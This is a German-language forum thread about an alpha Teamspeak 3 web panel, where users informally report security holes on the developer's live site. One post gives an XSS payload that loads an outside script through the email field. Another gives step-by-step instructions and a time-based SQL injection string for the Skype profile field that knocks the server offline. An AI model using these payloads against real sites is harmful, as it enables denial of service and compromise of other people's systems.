[ALPHA] Teamspeak 3 Webinterface

01/12/2017 15:42 First-Coder#16
Quote:
Originally Posted by 0xFADED View Post
Du solltest deine Form-Validation echt nochmal überarbeiten.
Das alles nur im JavaScript zu machen eröffnet so einiges an Möglichkeiten für Angreifer.

Konnte meine email Adresse problemlos zu dem hier ändern:
Code:
"><script src="//hi.kickassapp.com/kickass.js"></script>@aol.de
Aber hey: Wenigstens kann ich jetzt bei dir Space Invaders spielen :D
[Only registered and activated users can see links. Click Here To Register...]
Das ist richtg... Danke für den XSS... Habe ihn aber gerade behoben ;).

Und ja ansonsten bin ich gerne bereit die challange anzunehmen. Versucht die Seite zu crashen ;)... Ich bin gespannt
01/12/2017 15:58 0xFADED#17
Quote:
Originally Posted by First-Coder View Post
Das ist richtg... Danke für den XSS... Habe ihn aber gerade behoben ;).

Und ja ansonsten bin ich gerne bereit die challange anzunehmen. Versucht die Seite zu crashen ;)... Ich bin gespannt
Crash erfolgreich.
Hab admin sessions die nicht auslaufen und richtig viel Spass im Panel.

[Only registered and activated users can see links. Click Here To Register...]

[Only registered and activated users can see links. Click Here To Register...]

[Only registered and activated users can see links. Click Here To Register...]
01/12/2017 16:00 First-Coder#18
Definiere nicht auslaufen?

Die Rechte aktualsieren sich alle x sekunden von daher laufen die sessions auch nicht aus... daher frage ich
01/12/2017 16:07 0xFADED#19
Quote:
Originally Posted by First-Coder View Post
Definiere nicht auslaufen?

Die Rechte aktualsieren sich alle x sekunden von daher laufen die sessions auch nicht aus... daher frage ich
Bitte WAS?
Dann ist das (abgesehen von den völlig unnötig hohen Permissions) die (bis jetzt) grösste Sicherheitslücke
die im Laufe des Gesprächs in deinem System aufgetaucht ist.
01/12/2017 16:41 First-Coder#20
Quote:
Originally Posted by 0xFADED View Post
Bitte WAS?
Dann ist das (abgesehen von den völlig unnötig hohen Permissions) die (bis jetzt) grösste Sicherheitslücke
die im Laufe des Gesprächs in deinem System aufgetaucht ist.
Ich habe die Einstellungen mal wieder ein wenig netter geschrieben und das gant "penis" was ihr reingeschrieben habt gelöscht.

Bis jetzt sieht die Seite nicht gecrasht aus.... :cool:
01/12/2017 18:32 Shadow992#21
Quote:
Originally Posted by First-Coder View Post
Ich habe die Einstellungen mal wieder ein wenig netter geschrieben und das gant "penis" was ihr reingeschrieben habt gelöscht.

Bis jetzt sieht die Seite nicht gecrasht aus.... :cool:
Sicher? Schau dir doch mal die Server-Auslastung an. ;)
01/12/2017 18:51 First-Coder#22
Quote:
Originally Posted by Shadow992 View Post
Sicher? Schau dir doch mal die Server-Auslastung an. ;)
Da das nicht wirklich mit der Homepage zusammen hängt jap :p. Das kleine Bot Netz was den kleinen vServer floatet ist nicht wirklich schlimm :D. Ich meine die, die es später nutzen haben ja eine protection gegen botkiddies :handsdown:
01/12/2017 19:11 Shadow992#23
Quote:
Originally Posted by First-Coder View Post
Da das nicht wirklich mit der Homepage zusammen hängt jap :p. Das kleine Bot Netz was den kleinen vServer floatet ist nicht wirklich schlimm :D. Ich meine die, die es später nutzen haben ja eine protection gegen botkiddies :handsdown:
Ich gebs auf, du checkst es auch nicht mehr... Als ob ich ein Botnetz drüberlaufen lassen würde, jeder mit halbwegs Linux/SQL Kentnissen kann dieses Ergebnis reproduzueren, sogar in noch krasser. Und wenn du auch nur einen Funken Ahnung hättest, hättest du mal in die Prozess-Liste geschaut oder in deine HTTP-Logs, dann hättest du gesehen, dass dein Server nicht wegen unmengen an Requests einbricht, sondern wegen Sicherheitslücken, die man easy für allerlei Sachen benutzen kann...

Aber wayne, wir haben dir gesagt wo die Probleme liegen und dich mehr als nur einmal versucht vom Gegenteil zu überzeugen, nämlich davon, dass dein Codealles andere als sicher ist. Wer nicht will, der hat schon und da du mir sowieso ein Profi zu sein scheinst lass ichs mal bleiben. Du machst das schon du Profi.

Wie kann man nur so lernresistent sein...

Edit:
Für alle die sich fragen: Wie?
Einfach folgendes der Reihe nach machen:

0. Auf [Only registered and activated users can see links. Click Here To Register...] navigieren
1. Neuen Account registrieren und einloggen
2. auf "Edit Profile" klicken
3. Folgendes in das "Skype"-Feld pasten:
Quote:
'; SELECT BENCHMARK(9999999999,MD5(RAND()));--
4. Den grünen Haken daneben anklicken.
5. Der Server ist jetzt mit diesem sehr abgespeckten Befehl ca 1-2min down.

Das war aber wirklich mein letzter Satz zu diesem Thema.
01/17/2017 09:07 xEr0r#24
Riech ich da etwa SQL-Injection
01/17/2017 13:40 florian0#25
Quote:
Originally Posted by xEr0r View Post
Riech ich da etwa SQL-Injection
Die SQL Injection steht doch schon da ... da musst du nix riechen, einfach nur lesen.
01/17/2017 15:13 Shadow992#26
Quote:
Originally Posted by xEr0r View Post
Riech ich da etwa SQL-Injection
Scheint mittlerweile großteils ausgebessert, unmengen an XSS-Lücken gibts trotzdem noch, genau so wie Session-Sniffing noch ohne Probleme möglich ist.